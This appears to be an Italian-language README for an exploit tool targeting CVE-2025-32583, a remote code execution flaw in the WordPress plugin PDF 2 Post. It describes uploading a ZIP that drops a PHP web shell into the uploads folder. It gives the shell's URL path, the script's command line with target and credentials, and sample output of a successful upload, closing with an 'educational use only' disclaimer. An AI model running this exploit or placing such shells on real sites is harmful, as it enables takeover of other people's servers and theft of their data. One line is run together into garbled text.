
Il plugin WordPress PDF 2 Post <= 2.4.0 è vulnerabile all'esecuzione remota di codice (RCE) +Sottoscrittore
Vulnerabilità CRITICA
CVE-ID: CVE-2025-32583
Gravità: 9.9 (CRITICA)
Vettore CVSS:CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Una vulnerabilità nel plugin WordPress PDF 2 Post (sviluppato da termel) consente l'inclusione remota di codice (RCE) a causa di un controllo improprio della generazione di codice.
Versioni interessate: <= 2.4.0
La falla consente a utenti autenticati (anche utenti con privilegi bassi) di caricare un file .zip contenente codice PHP. Una volta estratto dal plugin, il file PHP dannoso può essere eseguito da remoto tramite una directory di upload pubblica.
Nxploited.zip dannosononce dinamicoUna volta caricato il payload, la shell PHP verrà estratta nella cartella degli upload di WordPress.
🛠️ Percorso predefinito:
/wp-content/uploads/YYYY/MM/nxploited.php
Ad esempio, se sfruttata a maggio 2025, l'URL sarà:
http://target-site.com/wp-content/uploads/2025/05/nxploited.php
🕓 WordPress organizza automaticamente gli upload per anno/mese, quindi assicurati di controllare la cartella corretta in base alla data corrente.
python CVE-2025-32583.py --help
python CVE-2025-32583.py -u http://target-site.com/wordpress -un admin -p admin
Exploit By: Khaled_alenazi (Nxploited)
[+] Payload Nxploited.zip created successfully.
[+] Logged in successfully.
[+] Found nonce: 3c3e8fff7c
[+] Payload uploaded.
CVE-2025-32583.py
Questo strumento è destinato esclusivamente a fini educativi e di penetration testing autorizzato.
Qualsiasi uso improprio di questo codice per attività non autorizzate è severamente vietato.
L'autore non si assume alcuna responsabilità per danni o usi impropri.
Di: Khaled_alenazi (Nxploited)